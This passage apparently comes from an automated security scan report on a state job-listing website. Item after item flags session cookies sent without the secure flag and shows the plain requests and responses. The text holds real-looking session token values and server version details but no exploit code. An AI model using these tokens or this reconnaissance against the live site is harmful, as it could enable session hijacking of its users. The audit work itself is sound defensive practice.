PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

7.79. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_offices_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.80. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_protectyourself_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.81. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.82. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
location: mn_empagreement_dsp.cfm
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
<!-- Caching is Off -->

7.83. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_settings_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.84. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_ssncheck.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.85. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_veterans_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.86. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/mn_warninfo_dsp.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

7.87. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.88. https://www.vermontjoblink.com/ada/works/FAQ.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/FAQ.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
